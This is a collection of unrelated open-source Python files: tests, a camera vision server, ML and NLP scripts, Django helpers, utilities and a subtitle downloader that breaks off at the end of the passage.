self.assertIn("tag", bot.store.tags)
self.assertEqual(len(bot.store.elements), 3)
bot.handle_message({
"user": "test_owner_id",
"text": "remove url",
"channel": "Dtest_channel",
"ts": "test_ts"
})
self.assertNotIn("tag", bot.store.tags)
self.assertEqual(len(bot.store.elements), 2)
def test_admin_access(self, *args):
""" Test that basic admin commands work only for the owner """
bot = GifBot("test.config", MagicMock())
self.assertNotIn("tag", bot.store.tags)
self.assertEqual(len(bot.store.elements), 2)
bot.handle_message({
"user": "test_user_id",
"text": "add url tag",
"channel": "Dtest_channel",
"ts": "test_ts"
})
self.assertNotIn("tag", bot.store.tags)
self.assertEqual(len(bot.store.elements), 2)
|
bedder/gifbot
|
test/test_gif_bot.py
|
Python
|
mit
| 7,000
|
import json
from django import template
from django.utils.safestring import mark_safe
register = template.Library()
@register.filter
def jsonify(value):
return mark_safe(json.dumps(value))
|
tayfun/bilgisayfam
|
bilgisayfam/utils/templatetags/jsonify.py
|
Python
|
mit
| 197
|
import cv2
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from threading import Thread
import imutils
import sys
import socket
import numpy as np
import time
from operator import itemgetter
import math
import os
from subprocess import Popen, PIPE, STDOUT
import socket
import selectors
import os
import threading
__all__ = ["BaseServer", "TCPServer", "UDPServer", "ForkingUDPServer",
"ForkingTCPServer", "ThreadingUDPServer", "ThreadingTCPServer",
"BaseRequestHandler", "StreamRequestHandler",
"DatagramRequestHandler", "ThreadingMixIn", "ForkingMixIn"]
if hasattr(socket, "AF_UNIX"):
__all__.extend(["UnixStreamServer", "UnixDatagramServer",
"ThreadingUnixStreamServer",
"ThreadingUnixDatagramServer"])
# poll/select have the advantage of not requiring any extra file descriptor,
# contrarily to epoll/kqueue (also, they require a single syscall).
if hasattr(selectors, 'PollSelector'):
_ServerSelector = selectors.PollSelector
else:
_ServerSelector = selectors.SelectSelector
def contourArea(contours):
area = []
for i in range(0, len(contours)):
area.append([cv2.contourArea(contours[i]), i])
area.sort(key=itemgetter(1))
return area[len(area) - 1]
def widthDistanceCalc(x):
return -0.0003 * math.pow(x, 3) + 0.0881 * x * x - 10.336 * x + 553.9
class InetChecker:
def __init__(self):
self.inet = False
self.command = 'sudo ping -c 1 192.168.1.1'
#self.command = 'ping -n 1 192.168.1.1'
self.stopped = False
def start(self):
Thread(target=self.update, args=()).start()
return self
def update(self):
while True:
if self.stopped:
return
#response = Popen(self.command, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT).stdout.read().decode()
response = Popen(self.command, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT,close_fds=True).stdout.read().decode()
if ('Network is unreachable' in response):
self.inet = False
else:
self.inet = True
time.sleep(0.8)
def getInet(self):
return self.inet
def stop(self):
self.stopped = True
class SendThread:
def __init__(self, url='', port=8080):
self.UDP_IP = url
self.PORT = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.message = ''
self.stopped = False
self.steady = False
def start(self):
Thread(target=self.update, args=()).start()
def update(self):
while True:
if self.stopped:
self.sock.close()
return
if (not self.steady):
self.sock.sendto(self.message.encode(), (self.UDP_IP, self.PORT))
else:
pass
def stop(self):
self.stopped = True
def changeMessage(self, string):
self.message = string
def idle(self):
self.steady = True
class ReceiveThread:
def __init__(self, url='', port=8080):
UDP_IP = url
PORT = port
self.BUFF_SIZE = 1024
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.bind((UDP_IP, PORT))
self.message = ''
self.stopped = False
self.steady = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
def update(self):
while True:
if self.stopped:
self.sock.close()
return
if (not self.steady):
data, addr = self.sock.recvfrom(self.BUFF_SIZE)
if (data.decode() != ''):
self.message = data.decode()
else:
self.message = ''
else:
pass
def getMessage(self):
return self.message
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def idle(self):
self.steady = True
class CamHandler(BaseHTTPRequestHandler):
def do_GET(self):
print(self.path)
if self.path.endswith('/stream.mjpg'):
self.send_response(20)
self.send_header('Content-type', 'multipart/x-mixed-replace; boundary=--jpgboundary')
self.end_headers()
while True:
try:
r, buf = cv2.imencode(".jpg", frame)
try:
self.wfile.write("--jpgboundary\r\n".encode())
self.end_headers()
self.wfile.write(bytearray(buf))
except KeyboardInterrupt:
pass
except KeyboardInterrupt:
break
return
if self.path.endswith('.html') or self.path == "/":
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write('<html><head></head><body>')
self.wfile.write('<img src="http://localhost:5810/stream.mjpg" height="480px" width="640px"/>')
self.wfile.write('</body></html>')
return
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def serve_forever(self, poll_interval=0.5):
try:
# XXX: Consider using another file descriptor or connecting to the
# socket to wake this up instead of polling. Polling reduces our
# responsiveness to a shutdown request and wastes cpu at all other
# times.
with _ServerSelector() as selector:
selector.register(self, selectors.EVENT_READ)
while True:
if inet:
ready = selector.select(poll_interval)
if ready:
self._handle_request_noblock()
self.service_actions()
else:
pass
finally:
pass
class WebcamVideoStream:
def __init__(self, src=0):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
# self.stream.set(3, 1920)
# self.stream.set(4, 1080)
# self.stream.set(15,-100)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
self.stream.release()
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def realmain():
global frame
global inet
lower_green = (55, 140, 110)
upper_green = (90, 256, 256)
UDP_SEND_PORT = 5800
UDP_COMP_PORT = 5801
UDP_IP = ''
UDP_RIO = '10.54.65.79'
# UDP_RIO = '192.168.43.157'
font = cv2.FONT_HERSHEY_SIMPLEX
send = SendThread(url=UDP_RIO, port=UDP_SEND_PORT)
send.start()
receive = ReceiveThread(url=UDP_IP, port=UDP_COMP_PORT)
receive.start()
ip = ''
cap = WebcamVideoStream(src=0).start()
os.system('v4l2-ctl --set-ctrl brightness=80')
secondcap = WebcamVideoStream(src=1).start()
server = ThreadedHTTPServer((ip, 5810), CamHandler)
inet = False
internet = InetChecker().start()
target = Thread(target=server.serve_forever, args=())
target.daemon = True
print("starting server ")
try:
i = 0
while True:
inet = internet.getInet()
if inet:
img = cap.read()
img1 = secondcap.read()
t = imutils.resize(img, width=640, height=480)
tcam2 = imutils.resize(img1, width=640, height=480)
img2 = cv2.GaussianBlur(t, (5, 5), 0)
hsv = cv2.cvtColor(img2, cv2.COLOR_BGR2HSV)
# construct a mask for the color "green", then perform
# a series of dilations and erosions to remove any small
# blobs left in the mask
mask = cv2.inRange(hsv, lower_green, upper_green)
edged = cv2.Canny(mask, 35, 125)
# find contours in the mask and initialize the current
# (x, y) center of the ball
im2, cnts, hierarchy = cv2.findContours(edged.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)
if (len(cnts) >= 1):
area, place = contourArea(cnts)
if (area >= 100):
maxc = cnts[place]
rect = cv2.minAreaRect(maxc)
box = cv2.boxPoints(rect)
box = np.int0(box)
cv2.drawContours(t, [box], 0, (0, 0, 255), 2)
M = cv2.moments(maxc)
cx = int(M['m10'] / M['m00']) # Center of MASS Coordinates
cy = int(M['m01'] / M['m00'])
rect = cv2.minAreaRect(maxc)
height = rect[1][0]
width = rect[1][1]
widthreal = max(width, height)
heightreal = min(width, height)
distance = widthDistanceCalc(widthreal)
cv2.putText(t, '%s in. ' % (round(distance, 2)), (10, 400), font, 0.5, (0, 0, 255), 1)
send.changeMessage('Y ' + str(cx) + ' ' + str(cy) + ' ' + "{0:.2f}".format(
heightreal) + ' ' + "{0:.2f}".format(widthreal))
else:
send.changeMessage('N')
message = receive.getMessage()
if (message == '2'):
frame = tcam2
elif (message == '1'):
frame = t
elif (message == ''):
frame = tcam2
if (i == 0):
target.start()
i += 1
else:
send.idle()
receive.idle()
except KeyboardInterrupt:
cap.stop()
secondcap.stop()
target.join()
internet.stop()
target.join()
sys.exit()
if __name__ == '__main__':
realmain()
|
SachinKonan/Windows-RPI-Vision-Framework
|
Combined/visionServer.py
|
Python
|
mit
| 11,133
|
import functools
def concat(li: "list of strings") -> str:
return functools.reduce(lambda a, b: a + b, li)
def compose(*functions):
def compose2(f, g):
return lambda x: f(g(x))
return functools.reduce(compose2, functions)
def thread_compose(*functions):
return compose(*list(reversed(functions)))
def compose_and_call(initial_arg, *functions):
"""Given an initial value and a list of functions,
compose the list of functions and
call the composed function on the initial value."""
workflow = thread_compose(*functions)
return workflow(initial_arg)
|
zekna/py-types
|
py_types/utils.py
|
Python
|
mit
| 596
|
import threading
import queue
import time
import types
def schedule(task):
def send_message(self, message):
self.get_queue().put(message)
def set_queue(self, queue):
self.queue = queue
def get_queue(self):
return self.queue
task.send_message = types.MethodType(send_message, task)
task.set_queue = types.MethodType(set_queue, task)
task.get_queue = types.MethodType(get_queue, task)
task.set_queue(queue.Queue())
def background():
running = True
while running:
task.background()
item = None
try:
item = task.get_queue().get(timeout=1)
except Exception:
swallow = True
if item != None:
if item == "kill_thread":
running = False
else:
task.handle_message(item)
task.thread = threading.Thread(target=background)
task.thread.daemon = True
task.thread.start()
|
XBigTK13X/wiiu-memshark
|
background/background.py
|
Python
|
mit
| 833
|
def check(cur, uid):
cur.execute("SELECT first_login FROM users WHERE uid=%s", (str(uid),))
result = cur.fetchall()
if len(result) == 0:
return ("This was not found in the database.", 412)
return (str(result[0][0]), 200)
def get(cur, uid, jsonenc):
cur.execute("SELECT * FROM users WHERE uid=%s", (str(uid),))
result = cur.fetchall()
if len(result) == 0:
return ("This was not found in the database.", 412)
username = result[0][1]
email = result[0][3]
jsonresp = jsonenc.encode({"username": username, "email": email})
return (jsonresp, 200)
def save(do, jsondec, cur, uid):
if not do[3]:
return ("No JSON has been passed.", 400)
jsonreq = jsondec.decode(do[3])
email = jsonreq["email"]
username = jsonreq["username"]
cur.execute("SELECT uid FROM users WHERE username=%s", (username,))
results = cur.fetchall()
username_already_taken = False
for result in results:
if result[0] != uid:
username_already_taken = True
cur.execute("SELECT uid FROM users WHERE email=%s", (email,))
results = cur.fetchall()
email_already_in_use = False
for result in results:
if result[0] != uid:
email_already_in_use = True
if username_already_taken:
return ("This username is already taken.", 412);
if email_already_in_use:
return ("This email is already in use.", 412);
cur.execute("UPDATE users SET email=%s WHERE uid=%s", (email, str(uid)))
cur.execute("UPDATE users SET username=%s WHERE uid=%s", (username, str(uid)))
return ("", 202)
#TODO save the data, confirm the email and so on
def do(cur, uid):
cur.execute("UPDATE users SET first_login = false WHERE uid=%s", (str(uid),))
return ("", 202)
|
YtvwlD/dyluna
|
ajaxmod/first_login.py
|
Python
|
mit
| 1,638
|
#-*- coding:utf-8 -*-
"""
@author: Jeff Zhang
@date: 2017-08-22
"""
import numpy as np
import random
import math
random.seed(0)
# calculate a random number where: a <= rand < b
def rand(a, b):
return (b - a) * random.random() + a
def dtanh(y):
return 1.0 - y ** 2
def sigmoid(sum):
return 1.0 / (1.0 + math.pow(math.e, -1.0 * sum))
class NeuralNetwork:
def __init__(self, input_size, hidden_size, output_size):
# number of input, hidden, and output nodes
self.input_size = input_size + 1 # +1 for bias node
self.hidden_size = hidden_size
self.output_size = output_size
# activations for nodes
self.ai = [1.0] * self.input_size
self.ah = [1.0] * self.hidden_size
self.ao = [1.0] * self.output_size
# create weights
self.Wi = np.zeros([self.input_size, self.hidden_size])
self.Wo = np.zeros([self.hidden_size, self.output_size])
# set them to random vaules
for i in range(self.input_size):
for j in range(self.hidden_size):
self.Wi[i][j] = rand(-0.2, 0.2)
for j in range(self.hidden_size):
for k in range(self.output_size):
self.Wo[j][k] = rand(-2.0, 2.0)
def update(self, inputs):
# input activations
for i in range(self.input_size - 1):
self.ai[i] = inputs[i]
# hidden activations
for j in range(self.hidden_size):
sum = 0.0
for i in range(self.input_size):
sum = sum + self.ai[i] * self.Wi[i][j]
self.ah[j] = math.tanh(sum)
# output activations
for k in range(self.output_size):
sum = 0.0
for j in range(self.hidden_size):
sum = sum + self.ah[j] * self.Wo[j][k]
self.ao[k] = sigmoid(sum)
return self.ao[:]
def backPropagate(self, targets, N):
# calculate error terms for output
output_deltas = [0.0] * self.output_size
for k in range(self.output_size):
error = targets[k] - self.ao[k]
output_deltas[k] = error * self.ao[k] * (1 - self.ao[k])
# calculate error terms for hidden
hidden_deltas = [0.0] * self.hidden_size
for j in range(self.hidden_size):
error = 0.0
for k in range(self.output_size):
error = error + output_deltas[k] * self.Wo[j][k]
hidden_deltas[j] = error * dtanh(self.ah[j])
# update output weights
# N: learning rate
for j in range(self.hidden_size):
for k in range(self.output_size):
change = output_deltas[k] * self.ah[j]
self.Wo[j][k] = self.Wo[j][k] + N * change
# update input weights
for i in range(self.input_size):
for j in range(self.hidden_size):
change = hidden_deltas[j] * self.ai[i]
self.Wi[i][j] = self.Wi[i][j] + N * change
# calculate error
loss = 0.0
for k in range(len(targets)):
loss += 0.5 * (targets[k] - self.ao[k]) ** 2
return loss
def fit(self, X, y, iterations=1000, lr=0.5):
for i in range(iterations):
loss = 0.0
for index in range(len(X)):
inputs = X[index]
targets = y[index]
self.update(inputs)
loss += self.backPropagate(targets, lr)
if i % 100 == 0:
print('error %-.5f' % loss)
def predict(self, test_samples):
ypred = []
for index in range(len(test_samples)):
test_label = self.update(test_samples[index])
val = max(test_label)
pred = test_label.index(val)
ypred.append(pred)
# if test_label.index(val) == labels[index].argmax():
# pass
# else:
# err_samples.append([test_samples[index], test_label.index(val), labels[index].argmax()])
# print(test_samples[index],"-->",test_label.index(val) + 1,"<-->",labels[index].argmax()+1)
# print("Error Samples number is ", len(err_samples))
return ypred
|
jfzhang95/lightML
|
SupervisedLearning/NeuralNetwork.py
|
Python
|
mit
| 4,222
|
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 24 01:01:54 2017
@author: Suryansh
"""
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('C:/Users/Suryansh/Desktop/Data Science Project/nlp/Natural-Language-Processing/Natural_Language_Processing/Restaurant_Reviews.tsv', delimiter = '\t', quoting = 3)
# Cleaning the texts
import re
import nltk
nltk.download('stopwords')
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
corpus = []
for i in range(0, 1000):
review = re.sub('[^a-zA-Z]', ' ', dataset['Review'][i])
review = review.lower()
review = review.split()
ps = PorterStemmer()
review = [ps.stem(word) for word in review if not word in set(stopwords.words('english'))]
review = ' '.join(review)
corpus.append(review)
# Creating the Bag of Words model
from sklearn.feature_extraction.text import CountVectorizer
cv = CountVectorizer(max_features = 1500)
X = cv.fit_transform(corpus).toarray()
y = dataset.iloc[:, 1].values
# Splitting the dataset into the Training set and Test set
from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 0)
# Fitting random forests model to the Training set
from sklearn.ensemble import RandomForestClassifier
classifier=RandomForestClassifier(n_estimators=10,criterion="entropy",random_state=0)
classifier.fit(X_train, y_train)
# Predicting the Test set results
y_pred = classifier.predict(X_test)
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
cm
#removing the created objectes after the session is over:
del([X,X_test,X_train,cm,corpus,dataset,i,review,y,y_pred,y_test,y_train])
|
Maverick2024/R-vs-Python-why-you-should-learn-both
|
Python_NLP.py
|
Python
|
mit
| 1,886
|
"""
Compute a hash for a JSON data structure, such that semantically equivalent
JSON structures get the same hash. The notion of "semantic equivalence" is
currently rather basic and informal. Eg, the following are semantically
equivalent, and this is reflected in the computed hashes:
```
d3 = {'d1': {'a': 1, 'b': [1,2]}, 'd2': {'b': [1,2], 'a': 1}, 'L': [1, 2, 3]}
d4 = {'d2': {'b': [1,2], 'a': 1}, 'L': [1, 2, 3], 'd1': {'a': 1, 'b': [1,2]}}
print('d3 hash:', get_json_sem_hash(d3))
print('d4 hash:', get_json_sem_hash(d4))
assert get_json_sem_hash(d3) == get_json_sem_hash(d4)
```
This prints hash value 'e17246aa9136a25581fb859fdeb2dd1da4cda9a221124cd27208646749b85cd7'
for both d3 and d4.
If you find that `get_json_sem_hash()` doesn't return the same hash for 2 json structures
that *you* think are in fact "semantically equivalent", please raise an issue!
The idea for this approach was inspired by https://github.com/fraunhoferfokus/JSum. It
probably needs Python 3.5+ due to type hinting. Clearly the type hinting is not essential,
so if it's presence is a hindrance for lots of people, please raise an issue.
(C) Oliver Schoenborn
License: modified MIT, ie MIT plus the following restriction: This code
can be included in your code base only as the complete file, and this
license comment cannot be removed or changed. This code was taken from
https://github.com/schollii/sandals/blob/master/json_sem_hash.py. If you
find modifications necessary, please contribute a PR so that the open-source
community can benefit the same way you benefit from this file.
GIT_COMMIT: <REPLACE WHEN FILE COPIED FROM GITHUB>
"""
from typing import Union, Dict, List
import hashlib
JsonType = Union[str, int, float, List['JsonType'], 'JsonTree']
JsonTree = Dict[str, JsonType]
StrTreeType = Union[str, List['StrTreeType'], 'StrTree']
StrTree = Dict[str, StrTreeType]
def sorted_dict_str(data: JsonType) -> StrTreeType:
if type(data) == dict:
return {k: sorted_dict_str(data[k]) for k in sorted(data.keys())}
elif type(data) == list:
return [sorted_dict_str(val) for val in data]
else:
return str(data)
def get_json_sem_hash(data: JsonTree, hasher=hashlib.sha256) -> str:
return hasher(bytes(repr(sorted_dict_str(data)), 'UTF-8')).hexdigest()
|
schollii/sandals
|
json_sem_hash.py
|
Python
|
mit
| 2,297
|
#!/usr/bin/env python
import sys
def brute_force_optimal(string):
"""Return the longest duplicated substring.
Keyword Arguments:
string -- the string to examine for duplicated substrings
This approach examines each possible pair of starting points
for duplicated substrings. If the characters at those points are
the same, the match is extended up to the maximum length for those
points. Each new longest duplicated substring is recorded as the
best found so far.
This solution is optimal for the naive brute-force approach and
runs in O(n^3).
"""
lds = ""
string_length = len(string)
for i in range(string_length):
for j in range(i+1,string_length):
for substring_length in range(string_length-j):
if string[i+substring_length] != string[j+substring_length]:
break
elif substring_length + 1 > len(lds):
lds = string[i:i+substring_length+1]
return lds
if __name__ == "__main__":
print(brute_force_optimal(' '.join(map(str, sys.argv[1:]))))
|
taylor-peterson/longest-duplicated-substring
|
longest_duplicated_substring.py
|
Python
|
mit
| 1,103
|
"""
This script is used to make a standard healpixel database in the
`opsimsummary/example_data` repository. This database is a coarse grained
NSIDE = 128 healpixelized OpSim created from enigma_1189_micro.db and is used for
testing purposes.
NOTE: To make this database, it is important to run this from the scripts
directory. The `outfile` variable must be uncommented in the first line of the
code. The `opsimsummary/example_data/healpixels_micro.db` file is meant to be a
standard and not be regenerated. In case this needs to be regenerated (for
example, it is discovered that this file is incorrect, then the setup.py must
be run again to include the new file in the package directories for the tests to
pass.
"""
from __future__ import division, absolute_import, print_function
import numpy as np
import time
import sqlite3
import healpy as hp
from healpy import query_disc, query_polygon
import opsimsummary as oss
import pandas as pd
from itertools import repeat
import os
from sqlalchemy import create_engine
import opsimsummary as oss
import gzip
import shutil
# outfile = os.path.join('../opsimsummary/example_data', 'healpixels_micro.db')
t_begin=time.time()
print('Time beginning {}'.format(t_begin))
# If outfile not provided, raise ValueError
if os.path.exists(outfile):
raise ValueError('output file already exists. If you want to overwrite, '
'rerun script after doing \n\nrm {}'\
.format(os.path.abspath(outfile)))
# database path that can always be found from the package
pkgDir = os.path.split(oss.__file__)[0]
dbname = os.path.join(pkgDir, 'example_data', 'enigma_1189_micro.db')
# Create the healpixelizedOpSim
NSIDE = 128
ho = oss.HealPixelizedOpSim.fromOpSimDB(opSimDBpath=dbname, subset='combined',
propIDs=None, NSIDE=NSIDE,
raCol='ditheredRA',
decCol='ditheredDec',
vecColName='vec',
fieldRadius=1.75)
twriteStart = time.time()
print('Time {} at starting the write to disk'.format(twriteStart))
# Write to disk
ho.writeToDB(outfile, verbose=True)
tendWriteDisk = time.time()
print('Time {} at ending the write to disk'.format(tendWriteDisk))
# gzip it
with open(outfile, 'rb') as f_in, gzip.open(outfile + '.gz', 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
tzipdone = time.time()
print('Time {} at ending the zip'.format(tzipdone))
# engineFile = 'sqlite:///' + dbname
# engine = create_engine(engineFile)
# opsim_hdf = '/Users/rbiswas/data/LSST/OpSimData/minion_1016.hdf'
# OpSim_combined = pd.read_sql_query('SELECT * FROM Summary WHERE PropID is 364',
# con=engine, index_col='obsHistID')
|
rbiswas4/simlib
|
scripts/make_healpixdb.py
|
Python
|
mit
| 2,819
|
from haystack import indexes
from .models import Lecture
class LectureIndex(indexes.SearchIndex, indexes.Indexable):
university = indexes.CharField(model_attr='university')
department = indexes.CharField(model_attr='department')
name = indexes.CharField(document=True, use_template=True)
year = indexes.IntegerField(model_attr='year')
def get_model(self):
return Lecture
def index_queryset(self, using=None):
return self.get_model().objects.all()
|
thebenwaters/openclickio
|
core/index.py
|
Python
|
mit
| 460
|
# coding: utf-8
"""
Example of a « echo » websocket server by using `tornado_websocket.WebSocket`.
"""
|
Dturati/projetoUFMT
|
estagio/estagio/base/websocket/echo.py
|
Python
|
mit
| 111
|
import os
from squadron.fileio.symlink import force_create_symlink
def compare_contents(one, two):
with open(one) as f1:
with open(two) as f2:
return f1.read() == f2.read()
def test_symlink(tmpdir):
tmpdir = str(tmpdir)
source1 = os.path.join(tmpdir, 'source1')
with open(source1, 'w') as f:
f.write('source1\n')
dest = os.path.join(tmpdir, 'dest')
force_create_symlink(source1, dest)
assert os.path.islink(dest)
assert compare_contents(source1, dest)
source2 = os.path.join(tmpdir, 'source2')
with open(source2, 'w') as f:
f.write('source2\n')
force_create_symlink(source2, dest)
assert os.path.islink(dest)
assert compare_contents(source2, dest)
|
gosquadron/squadron
|
squadron/fileio/tests/test_symlink.py
|
Python
|
mit
| 745
|
# -*- coding: utf-8 -*-
import os
import sys
import json
import time
import pytest
from errno import EEXIST
from shutil import rmtree
from tempfile import mkdtemp
from gevent import socket
from httplib import HTTPConnection
from urllib2 import build_opener, AbstractHTTPHandler
from gevent.subprocess import Popen, check_call
SRC_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', '..'))
SRC_COPPER_NODE = os.path.join(SRC_ROOT, 'cmd/copper-node')
check_call(['go', 'install'], shell=False, cwd=SRC_COPPER_NODE)
@pytest.yield_fixture
def workdir():
path = mkdtemp()
try:
yield path
finally:
rmtree(path, True)
@pytest.yield_fixture
def copper_node(workdir):
logpath = os.path.join(workdir, 'copper.log')
unixpath = os.path.join(workdir, 'copper.sock')
httppath = os.path.join(workdir, 'copper.http')
confpath = os.path.join(workdir, 'copper.conf')
config = {
"listen": [
{
"net": "unix",
"type": "http",
"addr": httppath,
},
{
"net": "unix",
"addr": unixpath,
"allow-changes": True,
},
],
}
with open(confpath, 'w') as f:
# YAML parses valid JSON data
json.dump(config, f)
with open(logpath, 'wb') as logfile:
p = Popen(['copper-node', '-config=' + confpath], shell=False, cwd=workdir, stdout=logfile, stderr=logfile)
try:
while not os.path.exists(unixpath):
time.sleep(0.001)
rc = p.poll()
if rc is not None:
with open(logpath, 'rb') as logfile:
sys.stderr.write(logfile.read())
raise RuntimeError('copper-node exited with status %r' % (rc,))
yield {
'unix': unixpath,
'http': httppath,
}
finally:
if p.poll() is None:
p.terminate()
p.wait()
@pytest.yield_fixture
def copper_client(copper_node):
from copper.client import Client
with Client(('unix', copper_node['unix'])) as client:
yield client
class CopperHTTPConnection(HTTPConnection):
def connect(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
timeout = self.timeout
if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT:
sock.settimeout(timeout)
sock.connect(self.host)
except:
sock.close()
raise
self.sock = sock
class CopperHTTPHandler(AbstractHTTPHandler):
def __init__(self, default_path):
AbstractHTTPHandler.__init__(self)
self.default_path = default_path
def copper_open(self, req):
return self.do_open(CopperHTTPConnection, req)
def copper_request(self, req):
host = req.get_host()
if not host:
req.host = self.default_path
# Go 1.7+ does not support malformed Host header
if not req.has_header('Host'):
req.add_unredirected_header('Host', 'copper')
return self.do_request_(req)
def copper_response(self, req, res):
return res
@pytest.fixture
def copper_http_client(copper_node):
return build_opener(CopperHTTPHandler(copper_node['http']))
|
snaury/copper
|
contrib/python-copper/t/conftest.py
|
Python
|
mit
| 3,321
|
import pygame as pg
import os
from Data.spritesheet_functions import SpriteSheet
from Data.images import *
from Data.level_classes import *
from Data.player_related import *
import Data.eztext
pg.init()
class Menu():
font_name = pg.font.SysFont('Terminal', 22, True, False)
txtbx = Data.eztext.Input(maxlength=10, color=(0, 0, 0), prompt='Name: ')
txtbx.set_pos(330, 436)
txtbx.set_font(font_name)
def __init__(self, background):
self.rightclicked = 0
self.background = background
self.position = 0
self.left_button = None
self.right_button = None
sprite_sheet = SpriteSheet('Resources\\main_character.png')
image = sprite_sheet.get_image(0, 635, 30, 51)
self.male = image
sprite_sheet = SpriteSheet('Resources\\main_character_female.png')
image = sprite_sheet.get_image(0, 635, 30, 51)
self.female = image
def draw(self, surface):
self.surface = surface
self.surface.blit(IMAGES[self.background], (0, 0))
pg.draw.rect(self.surface, (255, 255, 255), (326, 430, 170, 30), 0)
self.txtbx.draw(self.surface)
self.left_button = surface.blit(IMAGES['left_orange'], (325, 383))
self.right_button = surface.blit(IMAGES['right_orange'], (465, 383))
if self.position == 0:
self.surface.blit(self.male, (398, 320))
elif self.position == 1:
self.surface.blit(self.female, (398, 320))
elif self.position == 2:
self.surface.blit(self.bill, (398, 320))
def update(self, pos):
if self.left_button != None:
if self.left_button.collidepoint(pos):
self.rightclicked = 0
if self.position == 0:
pass
elif self.position != 0:
self.position -= 1
elif self.right_button.collidepoint(pos):
self.rightclicked += 1
if self.rightclicked >= 50:
self.position = 2
if self.position == 1 or self.position == 2:
pass
elif self.position == 0:
self.position += 1
def update_text(self, events):
self.player_name = self.txtbx.update(events)
if self.player_name != None:
if self.position == 0:
self.gender = "male"
elif self.position == 1:
self.gender = "female"
elif self.position == 2:
self.gender = "bill"
return True
def char_create():
main_menu = Menu('main_menu')
done = False
while done==False:
events = pg.event.get()
for event in events:
if event.type == pg.MOUSEBUTTONDOWN:
main_menu.update(pg.mouse.get_pos())
change = main_menu.update_text(events)
if change:
done = True
main_menu.draw(screen)
pg.display.flip()
player = Player(main_menu.gender)
player.name = main_menu.player_name
player.rect.x = 1800
player.rect.y = 1800
return player
|
JamesStudd/PythonRPG
|
Data/menu.py
|
Python
|
mit
| 3,185
|
from django.conf.urls import url
from . import views_for_staff
urlpatterns = [
url(r'^$',
views_for_staff.main,
name='staff_area'),
# Categories
url(r'^categories/$',
views_for_staff.categories,
name='categories'),
url(r'^categories/(?P<category_slug>[-\w]+)/$',
views_for_staff.categories,
name='category'),
url(r'^category_create/$',
views_for_staff.category_create,
name='category_create'),
url(r'^category_update/(?P<slug>[-\w]+)/$',
views_for_staff.category_update,
name='category_update'),
# Manufacturers
url(r'^manufacturers/$',
views_for_staff.manufacturers,
name='manufacturers'),
url(r'^manufacturer_create/$',
views_for_staff.manufacturer_create,
name='manufacturer_create'),
url(r'^manufacturer_update/(?P<slug>[-\w]+)/$',
views_for_staff.manufacturer_update,
name='manufacturer_update'),
# Products
url(r'^product_create/$',
views_for_staff.product_create,
name='product_create'),
url(r'^product_update/(?P<slug>[-\w]+)/$',
views_for_staff.product_update,
name='product_update'),
]
|
samitnuk/online_shop
|
apps/shop/urls_for_staff.py
|
Python
|
mit
| 1,213
|
#!/usr/bin/env python3
import os
from setuptools import setup, find_packages
# vcs+proto://host/path@revision#egg=project-version
# this is latest upstream commit (April 2017)
# upstream maintainer of urwidtrees doesn't maintain PyPI urwidtrees
urwidtrees_source = "git+https://github.com/pazz/urwidtrees.git@9142c59d3e41421ff6230708d08b6a134e0a8eed#egg=urwidtrees-1.0.3.dev"
requirements = [
"urwid",
"docker",
"urwidtrees"
]
setup(
name='sen',
version='0.6.2',
description="Terminal User Interface for Docker Engine",
author='Tomas Tomecek',
author_email='tomas@tomecek.net',
url="https://github.com/TomasTomecek/sen/",
license="MIT",
entry_points={
'console_scripts': ['sen=sen.cli:main'],
},
packages=find_packages(exclude=["*.tests", "*.tests.*", "tests.*", "tests"]),
install_requires=requirements,
dependency_links=[urwidtrees_source],
classifiers=['Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.4',
'Topic :: System :: Monitoring',
],
)
|
TomasTomecek/sen
|
setup.py
|
Python
|
mit
| 1,539
|
import subliminal
import io
from babelfish import Language
def get_subtitle_path(video_path, video_language):
video_extension = video_path.rsplit(".", 1)[-1]
return video_path.replace(video_extension, video_language.alpha3 + ".srt")
def save_subtitle(video, video_subtitle, encoding=None):
subtitle_path = get_subtitle_path(video.name, video_subtitle.language)
if encoding is None:
with io.open(subtitle_path, 'wb') as f:
f.write(video_subtitle.content)
else:
with io.open(subtitle_path, 'w', encoding=encoding) as f:
f.write(video_subtitle.text)
return subtitle_path
def get_subs(episode_path, language_codes):
lang = {Language(x) for x in language_codes}
result = set()
video = subliminal.scan_video(episode_path)
if video:
if lang.issubset(video.subtitle_languages):
# already have subs
